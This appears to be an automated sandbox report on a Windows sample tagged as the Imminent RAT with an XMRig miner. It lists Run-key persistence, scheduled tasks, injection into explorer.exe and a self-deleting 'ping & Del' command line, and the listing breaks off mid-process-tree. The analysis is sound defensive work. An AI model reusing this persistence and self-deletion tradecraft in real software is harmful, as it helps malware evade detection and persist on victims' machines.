Malware Analysis Report

2024-11-15 08:09

Sample ID 220925-q1q9gsehc5
Target 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
Tags imminent xmrig miner persistence spyware trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2

Threat Level: Known bad

The file 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2 was found to be: Known bad.

Malicious Activity Summary

imminent xmrig miner persistence spyware trojan

Imminent RAT

xmrig

XMRig Miner payload

Executes dropped EXE

Loads dropped DLL

Deletes itself

Checks computer location settings

Adds Run key to start application

Drops desktop.ini file(s)

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2022-09-25 13:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2022-09-25 13:43

Reported 2022-09-25 13:46

Platform win7-20220812-en

Max time kernel 152s

Max time network 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

Signatures

Imminent RAT

trojan spyware imminent

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Default Key = "C:\\Users\\Admin\\AppData\\Local\\Default Folder\\Server.exe" | C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Default Key = "\\Default Folder\\Server.exe" | C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1176 set thread context of 552 | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | C:\Windows\explorer.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31609.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskmgr.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\31609.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A
Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 1736 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 1736 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 1736 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 1736 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 1736 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 1736 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 1736 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 1428 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1428 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1428 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1428 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1988 wrote to memory of 472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1988 wrote to memory of 472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1988 wrote to memory of 472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1988 wrote to memory of 472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1428 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\31609.exe
PID 1428 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\31609.exe
PID 1428 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\31609.exe
PID 1428 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\31609.exe
PID 1504 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Windows\System32\cmd.exe
PID 1504 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Windows\System32\cmd.exe
PID 1504 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Windows\System32\cmd.exe
PID 1744 wrote to memory of 1956 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1744 wrote to memory of 1956 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1744 wrote to memory of 1956 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1504 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 1504 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 1504 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\31609.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 1176 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 1176 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 1176 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 828 wrote to memory of 332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 828 wrote to memory of 332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 828 wrote to memory of 332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1176 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 1176 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 1176 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 1176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Windows\SysWOW64\taskmgr.exe

"C:\Windows\System32\taskmgr.exe"

C:\Windows\SysWOW64\PING.EXE

